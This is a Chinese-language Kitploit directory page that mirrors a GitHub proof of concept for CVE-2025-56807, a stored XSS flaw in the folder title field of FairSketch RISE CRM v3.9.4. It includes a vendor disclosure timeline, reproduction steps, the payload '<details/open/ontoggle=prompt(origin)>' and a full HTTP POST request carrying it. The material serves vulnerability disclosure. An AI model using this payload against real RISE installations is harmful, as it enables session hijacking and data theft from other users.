Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-56807 — 针对 FairSketch RISE Ultimate Project Manager & CRM v3.9.4 中存储型 XSS 漏洞的概念验证,演示通过文件夹标题注入执行任意 JavaScript。 | Kitploit
工具/GitHubGitHub/aqwainfosec/cve-2025-56807
漏洞分析漏洞利用Web应用程序漏洞利用信息收集Web安全渗透测试
GitHubaqwainfosec/cve-2025-56807

CVE-2025-56807

针对 FairSketch RISE Ultimate Project Manager & CRM v3.9.4 中存储型 XSS 漏洞的概念验证,演示通过文件夹标题注入执行任意 JavaScript。

查看仓库
10年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-56807

描述

在FairSketch RISE Ultimate Project Manager & CRM (v3.9.4)的文件管理器功能中发现了一个存储型跨站脚本(XSS)漏洞。该漏洞位于创建新文件夹时提交的 title参数 中。由于输入清理不足,攻击者可以注入 HTML/JavaScript payloads(例如<details/open/ontoggle=prompt(origin)>)。该payload存储在文件夹名称中,并在文件管理器中列出文件夹时执行,允许任何查看受影响文件夹的用户浏览器执行任意JavaScript。这可能导致会话劫持和数据泄露。

[!NOTE]
此漏洞并非仅限管理员账户。任何在文件管理器中拥有创建新文件夹权限的用户账户都可能利用此漏洞。

披露时间线

  • 已分配CVE ID: CVE-2025-56807
  • 发现时间:2025年7月(由Aqwa Hameed发现)
  • 通知供应商:通过电子邮件联系Fairsketch支持
  • 响应:供应商于2025年7月22日确认

概念验证(PoC)

  1. 使用有效凭证登录。

  2. 导航至 文件

    仪表盘

  3. 点击 新建文件夹

    文件管理器

  4. 在 标题 字段中输入以下payload,输入:

<details/open/ontoggle=prompt(origin)>

文件夹标题

  1. 重新加载文件管理器页面以触发payload

    载荷执行

请求

POST /index.php/clients/save_folder HTTP/1.1
Host: rise.fairsketch.com
Cookie: [redacted]
Content-Length: 99
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: [redacted]
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://rise.fairsketch.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

id=&parent_id=&context=client&context_id=101&title=%3Cdetails%2Fopen%2Fontoggle%3Dprompt(origin)%3E
下载工具